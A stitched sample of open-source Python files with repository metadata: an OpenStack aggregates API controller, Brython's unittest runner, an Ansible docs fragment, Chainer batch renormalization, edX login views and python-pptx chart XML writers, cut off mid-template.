updates = body["aggregate"]
try:
aggregate = self.api.update_aggregate(context, id, updates)
except exception.AggregateNameExists as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
# NOTE(gmann): Returns 200 for backwards compatibility but should be 204
# as this operation complete the deletion of aggregate resource and return
# no response body.
@extensions.expected_errors((400, 404))
def delete(self, req, id):
"""Removes an aggregate by id."""
context = _get_context(req)
authorize(context, action='delete')
try:
self.api.delete_aggregate(context, id)
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
# NOTE(gmann): Returns 200 for backwards compatibility but should be 202
# for representing async API as this API just accepts the request and
# request hypervisor driver to complete the same in async mode.
@extensions.expected_errors((400, 404, 409))
@wsgi.action('add_host')
@validation.schema(aggregates.add_host)
def _add_host(self, req, id, body):
"""Adds a host to the specified aggregate."""
host = body['add_host']['host']
context = _get_context(req)
authorize(context, action='add_host')
try:
aggregate = self.api.add_host_to_aggregate(context, id, host)
except (exception.AggregateNotFound,
exception.ComputeHostNotFound) as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except (exception.AggregateHostExists,
exception.InvalidAggregateAction) as e:
raise exc.HTTPConflict(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
# NOTE(gmann): Returns 200 for backwards compatibility but should be 202
# for representing async API as this API just accepts the request and
# request hypervisor driver to complete the same in async mode.
@extensions.expected_errors((400, 404, 409))
@wsgi.action('remove_host')
@validation.schema(aggregates.remove_host)
def _remove_host(self, req, id, body):
"""Removes a host from the specified aggregate."""
host = body['remove_host']['host']
context = _get_context(req)
authorize(context, action='remove_host')
try:
aggregate = self.api.remove_host_from_aggregate(context, id, host)
except (exception.AggregateNotFound, exception.AggregateHostNotFound,
exception.ComputeHostNotFound):
msg = _('Cannot remove host %(host)s in aggregate %(id)s') % {
'host': host, 'id': id}
raise exc.HTTPNotFound(explanation=msg)
except exception.InvalidAggregateAction:
msg = _('Cannot remove host %(host)s in aggregate %(id)s') % {
'host': host, 'id': id}
raise exc.HTTPConflict(explanation=msg)
return self._marshall_aggregate(aggregate)
@extensions.expected_errors((400, 404))
@wsgi.action('set_metadata')
@validation.schema(aggregates.set_metadata)
def _set_metadata(self, req, id, body):
"""Replaces the aggregate's existing metadata with new metadata."""
context = _get_context(req)
authorize(context, action='set_metadata')
metadata = body["set_metadata"]["metadata"]
try:
aggregate = self.api.update_aggregate_metadata(context,
id, metadata)
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
def _marshall_aggregate(self, aggregate):
_aggregate = {}
for key, value in aggregate.items():
# NOTE(danms): The original API specified non-TZ-aware timestamps
if isinstance(value, datetime.datetime):
value = value.replace(tzinfo=None)
_aggregate[key] = value
return {"aggregate": _aggregate}
class Aggregates(extensions.V21APIExtensionBase):
"""Admin-only aggregate administration."""
name = "Aggregates"
alias = ALIAS
version = 1
def get_resources(self):
resources = [extensions.ResourceExtension(
ALIAS,
AggregateController(),
member_actions={'action': 'POST'})]
return resources
def get_controller_extensions(self):
return []
|
apache-2.0
|
2014c2g7/c2g7
|
w2/static/Brython2.0.0-20140209-164925/Lib/unittest/main.py
|
739
|
10385
|
"""Unittest main program"""
import sys
import optparse
import os
from . import loader, runner
from .signals import installHandler
__unittest = True
FAILFAST = " -f, --failfast Stop on first failure\n"
CATCHBREAK = " -c, --catch Catch control-C and display results\n"
BUFFEROUTPUT = " -b, --buffer Buffer stdout and stderr during test runs\n"
USAGE_AS_MAIN = """\
Usage: %(progName)s [options] [tests]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s test_module - run tests from test_module
%(progName)s module.TestClass - run tests from module.TestClass
%(progName)s module.Class.test_method - run specified test method
[tests] can be a list of any number of test modules, classes and test
methods.
Alternative Usage: %(progName)s discover [options]
Options:
-v, --verbose Verbose output
%(failfast)s%(catchbreak)s%(buffer)s -s directory Directory to start discovery ('.' default)
-p pattern Pattern to match test files ('test*.py' default)
-t directory Top level directory of project (default to
start directory)
For test discovery all test modules must be importable from the top
level directory of the project.
"""
USAGE_FROM_MODULE = """\
Usage: %(progName)s [options] [test] [...]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s - run default set of tests
%(progName)s MyTestSuite - run suite 'MyTestSuite'
%(progName)s MyTestCase.testSomething - run MyTestCase.testSomething
%(progName)s MyTestCase - run all 'test*' test methods
in MyTestCase
"""
def _convert_name(name):
# on Linux / Mac OS X 'foo.PY' is not importable, but on
# Windows it is. Simpler to do a case insensitive match
# a better check would be to check that the name is a
# valid Python module name.
if os.path.isfile(name) and name.lower().endswith('.py'):
if os.path.isabs(name):
rel_path = os.path.relpath(name, os.getcwd())
if os.path.isabs(rel_path) or rel_path.startswith(os.pardir):
return name
name = rel_path
# on Windows both '\' and '/' are used as path
# separators. Better to replace both than rely on os.path.sep
return name[:-3].replace('\\', '.').replace('/', '.')
return name
def _convert_names(names):
return [_convert_name(name) for name in names]
class TestProgram(object):
"""A command-line program that runs a set of tests; this is primarily
for making test modules conveniently executable.
"""
USAGE = USAGE_FROM_MODULE
# defaults for testing
failfast = catchbreak = buffer = progName = warnings = None
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=None, testLoader=loader.defaultTestLoader,
exit=True, verbosity=1, failfast=None, catchbreak=None,
buffer=None, warnings=None):
if isinstance(module, str):
self.module = __import__(module)
for part in module.split('.')[1:]:
self.module = getattr(self.module, part)
else:
self.module = module
if argv is None:
argv = sys.argv
self.exit = exit
self.failfast = failfast
self.catchbreak = catchbreak
self.verbosity = verbosity
self.buffer = buffer
if warnings is None and not sys.warnoptions:
# even if DreprecationWarnings are ignored by default
# print them anyway unless other warnings settings are
# specified by the warnings arg or the -W python flag
self.warnings = 'default'
else:
# here self.warnings is set either to the value passed
# to the warnings args or to None.
# If the user didn't pass a value self.warnings will
# be None. This means that the behavior is unchanged
# and depends on the values passed to -W.
self.warnings = warnings
self.defaultTest = defaultTest
self.testRunner = testRunner
self.testLoader = testLoader
self.progName = os.path.basename(argv[0])
self.parseArgs(argv)
self.runTests()
def usageExit(self, msg=None):
if msg:
print(msg)
usage = {'progName': self.progName, 'catchbreak': '', 'failfast': '',
'buffer': ''}
if self.failfast != False:
usage['failfast'] = FAILFAST
if self.catchbreak != False:
usage['catchbreak'] = CATCHBREAK
if self.buffer != False:
usage['buffer'] = BUFFEROUTPUT
print(self.USAGE % usage)
sys.exit(2)
def parseArgs(self, argv):
if ((len(argv) > 1 and argv[1].lower() == 'discover') or
(len(argv) == 1 and self.module is None)):
self._do_discovery(argv[2:])
return
parser = self._getOptParser()
options, args = parser.parse_args(argv[1:])
self._setAttributesFromOptions(options)
if len(args) == 0 and self.module is None:
# this allows "python -m unittest -v" to still work for
# test discovery. This means -c / -b / -v / -f options will
# be handled twice, which is harmless but not ideal.
self._do_discovery(argv[1:])
return
if len(args) == 0 and self.defaultTest is None:
# createTests will load tests from self.module
self.testNames = None
elif len(args) > 0:
self.testNames = _convert_names(args)
if __name__ == '__main__':
# to support python -m unittest ...
self.module = None
else:
self.testNames = (self.defaultTest,)
self.createTests()
def createTests(self):
if self.testNames is None:
self.test = self.testLoader.loadTestsFromModule(self.module)
else:
self.test = self.testLoader.loadTestsFromNames(self.testNames,
self.module)
def _getOptParser(self):
import optparse
parser = optparse.OptionParser()
parser.prog = self.progName
parser.add_option('-v', '--verbose', dest='verbose', default=False,
help='Verbose output', action='store_true')
parser.add_option('-q', '--quiet', dest='quiet', default=False,
help='Quiet output', action='store_true')
if self.failfast != False:
parser.add_option('-f', '--failfast', dest='failfast', default=False,
help='Stop on first fail or error',
action='store_true')
if self.catchbreak != False:
parser.add_option('-c', '--catch', dest='catchbreak', default=False,
help='Catch ctrl-C and display results so far',
action='store_true')
if self.buffer != False:
parser.add_option('-b', '--buffer', dest='buffer', default=False,
help='Buffer stdout and stderr during tests',
action='store_true')
return parser
def _setAttributesFromOptions(self, options):
# only set options from the parsing here
# if they weren't set explicitly in the constructor
if self.failfast is None:
self.failfast = options.failfast
if self.catchbreak is None:
self.catchbreak = options.catchbreak
if self.buffer is None:
self.buffer = options.buffer
if options.verbose:
self.verbosity = 2
elif options.quiet:
self.verbosity = 0
def _addDiscoveryOptions(self, parser):
parser.add_option('-s', '--start-directory', dest='start', default='.',
help="Directory to start discovery ('.' default)")
parser.add_option('-p', '--pattern', dest='pattern', default='test*.py',
help="Pattern to match tests ('test*.py' default)")
parser.add_option('-t', '--top-level-directory', dest='top', default=None,
help='Top level directory of project (defaults to start directory)')
def _do_discovery(self, argv, Loader=None):
if Loader is None:
Loader = lambda: self.testLoader
# handle command line args for test discovery
self.progName = '%s discover' % self.progName
parser = self._getOptParser()
self._addDiscoveryOptions(parser)
options, args = parser.parse_args(argv)
if len(args) > 3:
self.usageExit()
for name, value in zip(('start', 'pattern', 'top'), args):
setattr(options, name, value)
self._setAttributesFromOptions(options)
start_dir = options.start
pattern = options.pattern
top_level_dir = options.top
loader = Loader()
self.test = loader.discover(start_dir, pattern, top_level_dir)
def runTests(self):
if self.catchbreak:
installHandler()
if self.testRunner is None:
self.testRunner = runner.TextTestRunner
if isinstance(self.testRunner, type):
try:
testRunner = self.testRunner(verbosity=self.verbosity,
failfast=self.failfast,
buffer=self.buffer,
warnings=self.warnings)
except TypeError:
# didn't accept the verbosity, buffer or failfast arguments
testRunner = self.testRunner()
else:
# it is assumed to be a TestRunner instance
testRunner = self.testRunner
self.result = testRunner.run(self.test)
if self.exit:
sys.exit(not self.result.wasSuccessful())
main = TestProgram
|
gpl-2.0
|
abtreece/ansible
|
lib/ansible/utils/module_docs_fragments/backup.py
|
427
|
1071
|
# Copyright (c) 2015 Ansible, Inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
class ModuleDocFragment(object):
# Standard documentation fragment
DOCUMENTATION = '''
options:
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
required: false
choices: [ "yes", "no" ]
default: "no"
'''
|
mit
|
aonotas/chainer
|
chainer/functions/normalization/batch_renormalization.py
|
1
|
8651
|
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function
from chainer.utils import type_check
def _as4darray(arr):
if arr.ndim == 0:
return arr.reshape(1, 1, 1, 1)
elif arr.ndim == 4:
return arr
else:
return arr.reshape(arr.shape[0], -1, 1, 1)
def _xhat(x, mean, std, expander):
x_mu = x - mean[expander]
x_mu /= std[expander]
return x_mu
class BatchRenormalizationFunction(function.Function):
def __init__(self, eps=2e-5, mean=None, var=None, decay=0.9,
rmax=1, dmax=0, freeze_running_statistics=False):
self.running_mean = mean
self.running_var = var
self.rmax = rmax
self.dmax = dmax
self.r = None
self.d = None
self.freeze_running_statistics = freeze_running_statistics
self.eps = eps
self.mean_cache = None
self.decay = decay
def check_type_forward(self, in_types):
n_in = type_check.eval(in_types.size())
if n_in != 3 and n_in != 5:
raise type_check.InvalidType(
'%s or %s' % (in_types.size() == 3, in_types.size() == 5),
'%s == %s' % (in_types.size(), n_in))
x_type, gamma_type, beta_type = in_types[:3]
M = type_check.eval(gamma_type.ndim)
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim >= gamma_type.ndim + 1,
x_type.shape[1:1 + M] == gamma_type.shape,
# TODO(tkerola): Check shape
gamma_type.dtype == x_type.dtype,
beta_type.dtype == x_type.dtype,
gamma_type.shape == beta_type.shape,
)
if len(in_types) == 5:
mean_type, var_type = in_types[3:]
type_check.expect(
mean_type.dtype == x_type.dtype,
mean_type.shape == gamma_type.shape,
var_type.dtype == x_type.dtype,
var_type.shape == gamma_type.shape,
)
def forward(self, inputs):
xp = cuda.get_array_module(*inputs)
x, gamma, beta = inputs[:3]
# Note: If length of inputs is not 5, we must be in train mode.
if len(inputs) != 5:
assert configuration.config.train
if configuration.config.train:
if self.running_mean is None:
self.running_mean = xp.zeros_like(gamma)
self.running_var = xp.zeros_like(gamma)
else:
self.running_mean = xp.array(self.running_mean)
self.running_var = xp.array(self.running_var)
elif len(inputs) == 5:
fixed_mean = inputs[3]
fixed_var = inputs[4]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
if configuration.config.train:
axis = (0,) + tuple(range(head_ndim, x.ndim))
mean = x.mean(axis=axis)
var = x.var(axis=axis) + self.eps
else:
mean = fixed_mean
var = fixed_var + self.eps
self.std = xp.sqrt(var, dtype=var.dtype)
if not self.freeze_running_statistics or self.r is None:
if configuration.config.train:
running_sigma = xp.sqrt(self.running_var + self.eps,
dtype=self.running_mean.dtype)
self.r = xp.clip(self.std / running_sigma,
1.0 / self.rmax, self.rmax)
self.d = xp.clip((mean - self.running_mean) / running_sigma,
-self.dmax, self.dmax)
# Update running statistics:
m = x.size // gamma[expander].size
self.running_mean *= self.decay
adjust = m / max(m - 1., 1.) # unbiased estimation
temp_ar = xp.array(mean)
temp_ar *= (1 - self.decay)
self.running_mean += temp_ar
del temp_ar
self.running_var *= self.decay
temp_ar = xp.array(var)
temp_ar *= (1 - self.decay) * adjust
self.running_var += temp_ar
del temp_ar
else:
self.r = xp.ones_like(gamma)
self.d = xp.zeros_like(gamma)
if self.freeze_running_statistics:
# Need to explicitly cast during gradient check, as r and d are
# not updated during finite differences
self.r = self.r.astype(gamma.dtype)
self.d = self.d.astype(gamma.dtype)
gamma = gamma[expander]
beta = beta[expander]
if xp is numpy:
self.x_hat = _xhat(x, mean, self.std, expander)
self.x_hat_renorm = self.x_hat * self.r[expander] + \
self.d[expander]
y = gamma * self.x_hat_renorm
y += beta
else:
self.x_hat, self.x_hat_renorm, y = cuda.elementwise(
'T x, T mean, T std, T gamma, T beta, T r, T d',
'T x_hat, T x_hat_renorm, T y',
'''
x_hat = (x - mean) / std;
x_hat_renorm = x_hat * r + d;
y = gamma * x_hat_renorm + beta;
''',
'bn_fwd')(x, mean[expander], self.std[expander], gamma,
beta, self.r[expander], self.d[expander])
return y,
def backward(self, inputs, grad_outputs):
x, gamma = inputs[:2]
gy = grad_outputs[0]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
m = gamma.dtype.type(x.size // gamma.size)
axis = (0,) + tuple(range(head_ndim, x.ndim))
xp = cuda.get_array_module(x)
if len(inputs) == 5:
# This case is unlikely to be used in practice and so does not
# need to be optimized for performance.
mean = inputs[3]
var = inputs[4] + self.eps
std = xp.sqrt(var, dtype=var.dtype)
gs = gamma / std
gbeta = gy.sum(axis=axis)
x_hat = _xhat(x, mean, std, expander)
ggamma = (gy * x_hat).sum(axis=axis)
gmean = -gs * gbeta
gvar = -0.5 * gamma / var * ggamma
gx = gs[expander] * gy
return gx, ggamma, gbeta, gmean, gvar
# Note: If length of inputs is not 5, we must be in train mode.
assert configuration.config.train
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
gbeta = gy.sum(axis=axis)
ggamma = (gy * self.x_hat_renorm).sum(axis=axis)
gsigma_batch = (gy * self.x_hat).sum(axis=axis)
if xp is numpy:
scale = (self.r * gamma / self.std)[expander]
gx = scale * (gy - (self.x_hat * gsigma_batch[expander] +
gbeta[expander]) / m)
else:
inv_m = numpy.float32(1) / m
gx = cuda.elementwise(
'T gy, T x_hat, T gamma, T std, T gsigma_batch, T gbeta, \
T inv_m, T r',
'T gx',
'gx = (r * gamma / std) * (gy - (x_hat * gsigma_batch + gbeta) * \
inv_m)',
'bn_bwd')(gy, self.x_hat, gamma[expander],
self.std[expander], gsigma_batch[expander],
gbeta[expander], inv_m, self.r[expander])
return gx, ggamma, gbeta
def batch_renormalization(x, gamma, beta, rmax, dmax, eps=2e-5,
running_mean=None, running_var=None, decay=0.9):
"""Batch renormalization function.
This is an extension of batch normalization, which ensures that the
training and inference models generate the same outputs that depend on
individual examples rather than the entire minibatch.
See: `Batch Renormalization: Towards Reducing Minibatch Dependence in \
Batch-Normalized Models <https://arxiv.org/abs/1702.03275>`_
.. seealso:: :class:`links.BatchRenormalization`
.. seealso:: :func:`functions.BatchNormalization`
"""
return BatchRenormalizationFunction(eps, running_mean, running_var,
decay, rmax, dmax)(x, gamma, beta)
def fixed_batch_renormalization(x, gamma, beta, mean, var, eps=2e-5):
with configuration.using_config('train', False):
return BatchRenormalizationFunction(eps, None, None, 0.0)(
x, gamma, beta, mean, var)
|
mit
|
doganov/edx-platform
|
cms/djangoapps/contentstore/views/public.py
|
47
|
2383
|
"""
Public views
"""
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.clickjacking import xframe_options_deny
from django.core.context_processors import csrf
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.conf import settings
from edxmako.shortcuts import render_to_response
from external_auth.views import (ssl_login_shortcut, ssl_get_cert_from_request,
redirect_with_get)
from microsite_configuration import microsite
__all__ = ['signup', 'login_page', 'howitworks']
@ensure_csrf_cookie
@xframe_options_deny
def signup(request):
"""
Display the signup form.
"""
csrf_token = csrf(request)['csrf_token']
if request.user.is_authenticated():
return redirect('/course/')
if settings.FEATURES.get('AUTH_USE_CERTIFICATES_IMMEDIATE_SIGNUP'):
# Redirect to course to login to process their certificate if SSL is enabled
# and registration is disabled.
return redirect_with_get('login', request.GET, False)
return render_to_response('register.html', {'csrf': csrf_token})
@ssl_login_shortcut
@ensure_csrf_cookie
@xframe_options_deny
def login_page(request):
"""
Display the login form.
"""
csrf_token = csrf(request)['csrf_token']
if (settings.FEATURES['AUTH_USE_CERTIFICATES'] and
ssl_get_cert_from_request(request)):
# SSL login doesn't require a login view, so redirect
# to course now that the user is authenticated via
# the decorator.
next_url = request.GET.get('next')
if next_url:
return redirect(next_url)
else:
return redirect('/course/')
if settings.FEATURES.get('AUTH_USE_CAS'):
# If CAS is enabled, redirect auth handling to there
return redirect(reverse('cas-login'))
return render_to_response(
'login.html',
{
'csrf': csrf_token,
'forgot_password_link': "//{base}/login#forgot-password-modal".format(base=settings.LMS_BASE),
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
}
)
def howitworks(request):
"Proxy view"
if request.user.is_authenticated():
return redirect('/home/')
else:
return render_to_response('howitworks.html', {})
|
agpl-3.0
|
m3dev/pptx-template
|
.eggs/python_pptx-0.6.6-py2.7.egg/pptx/chart/xmlwriter.py
|
2
|
67454
|
# encoding: utf-8
"""
Composers for default chart XML for various chart types.
"""
from __future__ import absolute_import, print_function, unicode_literals
from copy import deepcopy
from xml.sax.saxutils import escape
from ..compat import to_unicode
from ..enum.chart import XL_CHART_TYPE
from ..oxml import parse_xml
from ..oxml.ns import nsdecls
def ChartXmlWriter(chart_type, chart_data):
"""
Factory function returning appropriate XML writer object for
*chart_type*, loaded with *chart_type* and *chart_data*.
"""
XL_CT = XL_CHART_TYPE
try:
BuilderCls = {
XL_CT.AREA: _AreaChartXmlWriter,
XL_CT.AREA_STACKED: _AreaChartXmlWriter,
XL_CT.AREA_STACKED_100: _AreaChartXmlWriter,
XL_CT.BAR_CLUSTERED: _BarChartXmlWriter,
XL_CT.BAR_STACKED: _BarChartXmlWriter,
XL_CT.BAR_STACKED_100: _BarChartXmlWriter,
XL_CT.BUBBLE: _BubbleChartXmlWriter,
XL_CT.BUBBLE_THREE_D_EFFECT: _BubbleChartXmlWriter,
XL_CT.COLUMN_CLUSTERED: _BarChartXmlWriter,
XL_CT.COLUMN_STACKED: _BarChartXmlWriter,
XL_CT.COLUMN_STACKED_100: _BarChartXmlWriter,
XL_CT.DOUGHNUT: _DoughnutChartXmlWriter,
XL_CT.DOUGHNUT_EXPLODED: _DoughnutChartXmlWriter,
XL_CT.LINE: _LineChartXmlWriter,
XL_CT.LINE_MARKERS: _LineChartXmlWriter,
XL_CT.LINE_MARKERS_STACKED: _LineChartXmlWriter,
XL_CT.LINE_MARKERS_STACKED_100: _LineChartXmlWriter,
XL_CT.LINE_STACKED: _LineChartXmlWriter,
XL_CT.LINE_STACKED_100: _LineChartXmlWriter,
XL_CT.PIE: _PieChartXmlWriter,
XL_CT.PIE_EXPLODED: _PieChartXmlWriter,
XL_CT.RADAR: _RadarChartXmlWriter,
XL_CT.RADAR_FILLED: _RadarChartXmlWriter,
XL_CT.RADAR_MARKERS: _RadarChartXmlWriter,
XL_CT.XY_SCATTER: _XyChartXmlWriter,
XL_CT.XY_SCATTER_LINES: _XyChartXmlWriter,
XL_CT.XY_SCATTER_LINES_NO_MARKERS: _XyChartXmlWriter,
XL_CT.XY_SCATTER_SMOOTH: _XyChartXmlWriter,
XL_CT.XY_SCATTER_SMOOTH_NO_MARKERS: _XyChartXmlWriter,
}[chart_type]
except KeyError:
raise NotImplementedError(
'XML writer for chart type %s not yet implemented' % chart_type
)
return BuilderCls(chart_type, chart_data)
def SeriesXmlRewriterFactory(chart_type, chart_data):
"""
Return a |_BaseSeriesXmlRewriter| subclass appropriate to *chart_type*.
"""
XL_CT = XL_CHART_TYPE
RewriterCls = {
# There are 73 distinct chart types, only specify non-category
# types, others default to _CategorySeriesXmlRewriter. Stock-type
# charts are multi-plot charts, so no guaratees on how they turn
# out.
XL_CT.BUBBLE: _BubbleSeriesXmlRewriter,
XL_CT.BUBBLE_THREE_D_EFFECT: _BubbleSeriesXmlRewriter,
XL_CT.XY_SCATTER: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_LINES: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_LINES_NO_MARKERS: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_SMOOTH: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_SMOOTH_NO_MARKERS: _XySeriesXmlRewriter,
}.get(chart_type, _CategorySeriesXmlRewriter)
return RewriterCls(chart_data)
class _BaseChartXmlWriter(object):
"""
Generates XML text (unicode) for a default chart, like the one added by
PowerPoint when you click the *Add Column Chart* button on the ribbon.
Differentiated XML for different chart types is provided by subclasses.
"""
def __init__(self, chart_type, series_seq):
super(_BaseChartXmlWriter, self).__init__()
self._chart_type = chart_type
self._chart_data = series_seq
self._series_seq = list(series_seq)
@property
def xml(self):
"""
The full XML stream for the chart specified by this chart builder, as
unicode text. This method must be overridden by each subclass.
"""
raise NotImplementedError('must be implemented by all subclasses')
class _BaseSeriesXmlWriter(object):
"""
Provides shared members for series XML writers.
"""
def __init__(self, series, date_1904=False):
super(_BaseSeriesXmlWriter, self).__init__()
self._series = series
self._date_1904 = date_1904
@property
def name(self):
"""
The XML-escaped name for this series.
"""
return escape(self._series.name)
def numRef_xml(self, wksht_ref, number_format, values):
"""
Return the ``<c:numRef>`` element specified by the parameters as
unicode text.
"""
pt_xml = self.pt_xml(values)
return (
' <c:numRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:numCache>\n'
' <c:formatCode>{number_format}</c:formatCode>\n'
'{pt_xml}'
' </c:numCache>\n'
' </c:numRef>\n'
).format(**{
'wksht_ref': wksht_ref,
'number_format': number_format,
'pt_xml': pt_xml,
})
def pt_xml(self, values):
"""
Return the ``<c:ptCount>`` and sequence of ``<c:pt>`` elements
corresponding to *values* as a single unicode text string.
`c:ptCount` refers to the number of `c:pt` elements in this sequence.
The `idx` attribute value for `c:pt` elements locates the data point
in the overall data point sequence of the chart and is started at
*offset*.
"""
xml = (
' <c:ptCount val="{pt_count}"/>\n'
).format(
pt_count=len(values)
)
pt_tmpl = (
' <c:pt idx="{idx}">\n'
' <c:v>{value}</c:v>\n'
' </c:pt>\n'
)
for idx, value in enumerate(values):
if value is None:
continue
xml += pt_tmpl.format(idx=idx, value=value)
return xml
@property
def tx(self):
"""
Return a ``<c:tx>`` oxml element for this series, containing the
series name.
"""
xml = self._tx_tmpl.format(**{
'wksht_ref': self._series.name_ref,
'series_name': self.name,
'nsdecls': ' %s' % nsdecls('c'),
})
return parse_xml(xml)
@property
def tx_xml(self):
"""
Return the ``<c:tx>`` (tx is short for 'text') element for this
series as unicode text. This element contains the series name.
"""
return self._tx_tmpl.format(**{
'wksht_ref': self._series.name_ref,
'series_name': self.name,
'nsdecls': '',
})
@property
def _tx_tmpl(self):
"""
The string formatting template for the ``<c:tx>`` element for this
series, containing the series title and spreadsheet range reference.
"""
return (
' <c:tx{nsdecls}>\n'
' <c:strRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:strCache>\n'
' <c:ptCount val="1"/>\n'
' <c:pt idx="0">\n'
' <c:v>{series_name}</c:v>\n'
' </c:pt>\n'
' </c:strCache>\n'
' </c:strRef>\n'
' </c:tx>\n'
)
class _BaseSeriesXmlRewriter(object):
"""
Base class for series XML rewriters.
"""
def __init__(self, chart_data):
super(_BaseSeriesXmlRewriter, self).__init__()
self._chart_data = chart_data
def replace_series_data(self, chartSpace):
"""
Rewrite the series data under *chartSpace* using the chart data
contents. All series-level formatting is left undisturbed. If
the chart data contains fewer series than *chartSpace*, the extra
series in *chartSpace* are deleted. If *chart_data* contains more
series than the *chartSpace* element, new series are added to the
last plot in the chart and series formatting is "cloned" from the
last series in that plot.
"""
plotArea, date_1904 = chartSpace.plotArea, chartSpace.date_1904
chart_data = self._chart_data
self._adjust_ser_count(plotArea, len(chart_data))
for ser, series_data in zip(plotArea.sers, chart_data):
self._rewrite_ser_data(ser, series_data, date_1904)
def _add_cloned_sers(self, plotArea, count):
"""
Add `c:ser` elements to the last xChart element in *plotArea*, cloned
from the last `c:ser` child of that last xChart.
"""
def clone_ser(ser):
new_ser = deepcopy(ser)
new_ser.idx.val = plotArea.next_idx
new_ser.order.val = plotArea.next_order
ser.addnext(new_ser)
return new_ser
last_ser = plotArea.last_ser
for _ in range(count):
last_ser = clone_ser(last_ser)
def _adjust_ser_count(self, plotArea, new_ser_count):
"""
Adjust the number of c:ser elements in *plotArea* to *new_ser_count*.
Excess c:ser elements are deleted from the end, along with any xChart
elements that are left empty as a result. Series elements are
considered in xChart + series order. Any new c:ser elements required
are added to the last xChart element and cloned from the last c:ser
element in that xChart.
"""
ser_count_diff = new_ser_count - len(plotArea.sers)
if ser_count_diff > 0:
self._add_cloned_sers(plotArea, ser_count_diff)
elif ser_count_diff < 0:
self._trim_ser_count_by(plotArea, abs(ser_count_diff))
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite selected child elements of *ser* based on the values in
*series_data*.
"""
raise NotImplementedError('must be implemented by each subclass')
def _trim_ser_count_by(self, plotArea, count):
"""
Remove the last *count* ser elements from *plotArea*. Any xChart
elements having no ser child elements after trimming are also
removed.
"""
extra_sers = plotArea.sers[-count:]
for ser in extra_sers:
parent = ser.getparent()
parent.remove(ser)
extra_xCharts = [
xChart for xChart in plotArea.iter_xCharts()
if len(xChart.sers) == 0
]
for xChart in extra_xCharts:
parent = xChart.getparent()
parent.remove(xChart)
class _AreaChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:areaChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:roundedCorners val="0"/>\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:areaChart>\n'
'{grouping_xml}'
' <c:varyColors val="0"/>\n'
'{ser_xml}'
' <c:dLbls>\n'
' <c:showLegendKey val="0"/>\n'
' <c:showVal val="0"/>\n'
' <c:showCatName val="0"/>\n'
' <c:showSerName val="0"/>\n'
' <c:showPercent val="0"/>\n'
' <c:showBubbleSize val="0"/>\n'
' </c:dLbls>\n'
' <c:axId val="-2101159928"/>\n'
' <c:axId val="-2100718248"/>\n'
' </c:areaChart>\n'
'{cat_ax_xml}'
' <c:valAx>\n'
' <c:axId val="-2100718248"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2101159928"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="zero"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
